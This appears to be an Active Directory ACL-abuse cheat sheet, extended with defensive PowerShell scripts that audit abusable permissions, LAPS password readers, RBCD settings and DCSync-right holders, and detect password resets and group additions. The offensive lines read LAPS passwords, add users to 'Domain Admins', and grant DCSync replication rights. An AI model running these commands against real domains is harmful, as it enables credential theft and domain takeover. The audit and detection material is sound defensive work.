ACL Abuse

Enumeration

ADModule:
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1

# Get DistinguishedName
Get-ADUser -Identity USER

# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access

PowerView_Dev:
Find-InterestingDomainACL -ResolveGUIDs

PowerView:
Invoke-ACLScanner -ResolveGUIDs
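The same enumeration from the defender's side, as an added audit script that is not part of the original page and not PowerView or ADModule code: it walks the objects under a search base, resolves schema and extended-right GUIDs to names (what PowerView's -ResolveGUIDs does), and reports every Allow ACE that grants one of the rights this page lists to a principal outside an expected administrative set. It assumes the RSAT ActiveDirectory module; the regex of expected principals and the sample OU path are assumptions to adjust for your domain.

```powershell
# Added audit example (not from the original page): report ACEs that grant
# abusable rights to principals outside the expected administrative set.
# Assumes the RSAT ActiveDirectory module; the AD: PSDrive is created on import.
Import-Module ActiveDirectory

# Principals expected to hold broad rights; anything else is reported.
# Assumption: extend this for environment-specific groups (Exchange, tiering).
$ExpectedPrincipal = '^(NT AUTHORITY\\(SYSTEM|SELF|ENTERPRISE DOMAIN CONTROLLERS)|BUILTIN\\Administrators|CREATOR OWNER|[^\\]+\\(Domain Admins|Enterprise Admins|Domain Controllers|Enterprise Read-only Domain Controllers))$'
# Rights the cheat sheet lists as abusable.
$RightsOfInterest = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight|Self'

function Get-GuidNameMap {
    # Map schema attribute/class GUIDs and extended-right GUIDs to names.
    $rootDse = Get-ADRootDSE
    $map = @{}
    Get-ADObject -SearchBase $rootDse.schemaNamingContext -LDAPFilter '(schemaIDGUID=*)' -Properties name, schemaIDGUID |
        ForEach-Object { $map[([guid]$_.schemaIDGUID).Guid] = $_.name }
    Get-ADObject -SearchBase "CN=Extended-Rights,$($rootDse.configurationNamingContext)" -LDAPFilter '(objectClass=controlAccessRight)' -Properties name, rightsGUID |
        ForEach-Object { $map[([guid]$_.rightsGUID).Guid] = $_.name }
    return $map
}

function Get-AbusableAce {
    param(
        [string]$SearchBase = (Get-ADDomain).DistinguishedName,
        [string]$LDAPFilter = '(|(objectClass=user)(objectClass=group)(objectClass=computer)(objectClass=organizationalUnit)(objectClass=domainDNS))'
    )
    $guidMap = Get-GuidNameMap
    $allGuid = '00000000-0000-0000-0000-000000000000'
    foreach ($obj in Get-ADObject -SearchBase $SearchBase -LDAPFilter $LDAPFilter) {
        $acl = Get-Acl -Path "AD:\$($obj.DistinguishedName)"
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ace.IdentityReference.Value -match $ExpectedPrincipal) { continue }
            $rights = $ace.ActiveDirectoryRights.ToString()
            if ($rights -notmatch $RightsOfInterest) { continue }
            # Empty ObjectType means the right applies to the whole object.
            $type = $ace.ObjectType.Guid
            if ($type -eq $allGuid) { $typeName = 'All' }
            elseif ($guidMap.ContainsKey($type)) { $typeName = $guidMap[$type] }
            else { $typeName = $type }
            [pscustomobject]@{
                Object     = $obj.DistinguishedName
                Principal  = $ace.IdentityReference.Value
                Rights     = $rights
                ObjectType = $typeName
                Inherited  = $ace.IsInherited
            }
        }
    }
}

# Usage (assumed OU path): scan one OU first; a whole-domain scan is slow.
Get-AbusableAce -SearchBase 'OU=Servers,DC=corp,DC=example' | Format-Table -AutoSize
```

Rows with Inherited = True point at a parent container whose ACL is the real place to fix; a WriteProperty row is only interesting when its ObjectType is a sensitive attribute or 'All', which is why the GUID resolution is worth the extra schema query.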

ReadProperty, ExtendedRight over OU / Computer Object

This usually indicates LAPS: the principal named in IdentityReferenceName can read the cleartext LAPS password of the computers under that OU.

LAPS Module:
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1

# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>

# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>
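An added audit that reproduces what Find-AdmPwdExtendedRights reports without the LAPS module (this is example code, not part of the original page or of the AdmPwd.PS module): it resolves the schemaIDGUID of ms-Mcs-AdmPwd from the schema and lists every principal with an ExtendedRight ACE on that attribute, or on all extended rights, for each OU. It assumes legacy LAPS (the AdmPwd schema extension) and the RSAT ActiveDirectory module; Windows LAPS uses different attribute names and is not covered.

```powershell
# Added audit example (not from the original page): who can read the
# legacy LAPS password (ms-Mcs-AdmPwd) for computers under each OU.
# Assumes the RSAT ActiveDirectory module and the legacy LAPS schema extension.
Import-Module ActiveDirectory

function Get-LapsPasswordReader {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)
    $rootDse = Get-ADRootDSE
    # Resolve the attribute GUID from the schema rather than hard-coding it.
    $attr = Get-ADObject -SearchBase $rootDse.schemaNamingContext -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
    if (-not $attr) { throw 'ms-Mcs-AdmPwd is not in the schema; legacy LAPS is not installed.' }
    $lapsGuid = ([guid]$attr.schemaIDGUID).Guid
    $allGuid  = '00000000-0000-0000-0000-000000000000'
    $extended = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight

    foreach ($ou in Get-ADOrganizationalUnit -SearchBase $SearchBase -Filter *) {
        $acl = Get-Acl -Path "AD:\$($ou.DistinguishedName)"
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # ms-Mcs-AdmPwd is a confidential attribute: reading it needs
            # CONTROL_ACCESS (ExtendedRight) on the attribute or on everything.
            # GenericAll includes the ExtendedRight bit, so the mask test covers it.
            if (($ace.ActiveDirectoryRights -band $extended) -eq 0) { continue }
            $target = $ace.ObjectType.Guid
            if ($target -ne $lapsGuid -and $target -ne $allGuid) { continue }
            if ($target -eq $lapsGuid) { $scope = 'ms-Mcs-AdmPwd only' } else { $scope = 'All extended rights' }
            [pscustomobject]@{
                OU        = $ou.DistinguishedName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.ActiveDirectoryRights.ToString()
                Scope     = $scope
                Inherited = $ace.IsInherited
            }
        }
    }
}

Get-LapsPasswordReader | Sort-Object OU, Principal | Format-Table -AutoSize
```

Entries scoped to 'All extended rights' are the ones to review first: they are rarely granted on purpose for LAPS, and they also cover every other control-access right on the computers beneath that OU.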

WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group.

ADModule:
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS

# Check
Get-ADGroupMember -Identity "LocalAdmins"

PowerView_dev:
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'

GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform Resource Based Constrained Delegation Attack
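The write rights above matter because they allow msDS-AllowedToActOnBehalfOfOtherIdentity on the computer to be set. The following added check (example code, not from the original page) lists the computers in a domain where that attribute is populated and which principals each one has been configured to trust, so an unexpected entry on a server or domain controller stands out. It assumes the RSAT ActiveDirectory module.

```powershell
# Added check (not from the original page): find computers with resource-based
# constrained delegation configured and list the trusted principals.
# Assumes the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

function Get-RbcdTrust {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)
    $attr = 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    # Only computers where the attribute is set are returned by the LDAP filter.
    $computers = Get-ADComputer -SearchBase $SearchBase -LDAPFilter "($attr=*)" -Properties $attr
    foreach ($c in $computers) {
        # The AD module exposes this security-descriptor attribute as an
        # ActiveDirectorySecurity object, so its ACEs can be read directly.
        foreach ($ace in $c.$attr.Access) {
            [pscustomobject]@{
                Computer        = $c.Name
                AllowedToActFor = $ace.IdentityReference.Value
                AccessType      = $ace.AccessControlType
                Rights          = $ace.ActiveDirectoryRights.ToString()
            }
        }
    }
}

Get-RbcdTrust | Format-Table -AutoSize
```

In most environments this list is short and every entry is explainable (a front-end service account trusted by its back-end server); a domain controller or tier-0 server appearing here at all warrants a look at who holds write rights on that computer object.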

GenericAll over User Object

Can reset their password without knowing the old one
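Both the group-membership and the password-reset abuses above leave Security-log events on the domain controller that handled the change. The added detection below (example code, not part of the original page) reads those events from one domain controller and reports password resets and additions to a watch list of sensitive groups. It assumes audit policy for account and group management is enabled, and the domain controller name and group list are placeholders to replace.

```powershell
# Added detection example (not from the original page). Assumes Security
# auditing for user/group management is enabled and the caller can read the
# Security log of the domain controller named below (placeholder).
$DomainController = 'dc01.corp.example'
$SensitiveGroups  = @('Domain Admins', 'Enterprise Admins', 'Administrators', 'LocalAdmins')

function Get-SensitiveAccountChange {
    param([string]$ComputerName = $DomainController, [int]$Hours = 24)
    # 4724: an attempt was made to reset an account's password.
    # 4728 / 4732 / 4756: member added to a security-enabled global /
    # local / universal group.
    $filter = @{ LogName = 'Security'; Id = 4724, 4728, 4732, 4756; StartTime = (Get-Date).AddHours(-$Hours) }
    $events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($event in $events) {
        # Pull the named EventData fields out of the event XML.
        $xml  = [xml]$event.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $actor = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
        if ($event.Id -eq 4724) {
            [pscustomobject]@{ Time = $event.TimeCreated; Event = 'PasswordReset'; Actor = $actor; Target = $data['TargetUserName']; Group = $null }
        } else {
            # For group events TargetUserName is the group, MemberName the added DN.
            if ($SensitiveGroups -notcontains $data['TargetUserName']) { continue }
            [pscustomobject]@{ Time = $event.TimeCreated; Event = 'GroupMemberAdded'; Actor = $actor; Target = $data['MemberName']; Group = $data['TargetUserName'] }
        }
    }
}

Get-SensitiveAccountChange | Sort-Object Time | Format-Table -AutoSize
```

The Actor column is the point of the check: a membership change to a tier-0 group made by an account that is not itself an administrator is exactly the pattern the ACL abuses on this page produce.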

WriteDACL over DC

Can grant a user DCSync (directory replication) rights.

RACE:
Set-ADACL -SamAccountName USER\DOMAIN -DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose

PowerView3:
Add-DomainObjectAcl -TargetIdentity 'DC=techcorp,DC=local' -PrincipalIdentity USER -Rights DCSync
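DCSync rights are just the replication extended rights on the domain naming context, so the holders can be listed from its ACL. The added audit below (example code, not part of the original page, RACE or PowerView) reads the domain head's ACL and reports every principal holding one of the three replication extended rights, or all extended rights, which is the grant the two commands above create. It assumes the RSAT ActiveDirectory module.

```powershell
# Added audit example (not from the original page): who holds the directory
# replication extended rights on the domain naming context.
# Assumes the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

# Well-known extended-right GUIDs used by replication (and by DCSync).
$ReplicationRight = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-ReplicationRightHolder {
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)
    $allGuid  = '00000000-0000-0000-0000-000000000000'
    $extended = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $acl = Get-Acl -Path "AD:\$DomainDN"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $type = $ace.ObjectType.Guid
        if ($ReplicationRight.ContainsKey($type)) {
            $right = $ReplicationRight[$type]
        } elseif ($type -eq $allGuid -and (($ace.ActiveDirectoryRights -band $extended) -ne 0)) {
            # An unscoped ExtendedRight (or GenericAll) covers replication too.
            $right = 'All extended rights'
        } else {
            continue
        }
        [pscustomobject]@{
            Principal = $ace.IdentityReference.Value
            Right     = $right
            Rights    = $ace.ActiveDirectoryRights.ToString()
            Inherited = $ace.IsInherited
        }
    }
}

Get-ReplicationRightHolder | Sort-Object Principal, Right | Format-Table -AutoSize
```

Outside of Domain Controllers, Enterprise Domain Controllers, Enterprise Read-only Domain Controllers (Get-Changes only), Administrators and SYSTEM, any principal in this output can replicate password hashes. The same GUIDs appear in event 4662 when the right is exercised, which is the usual place to detect a DCSync against a domain controller.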

Resources
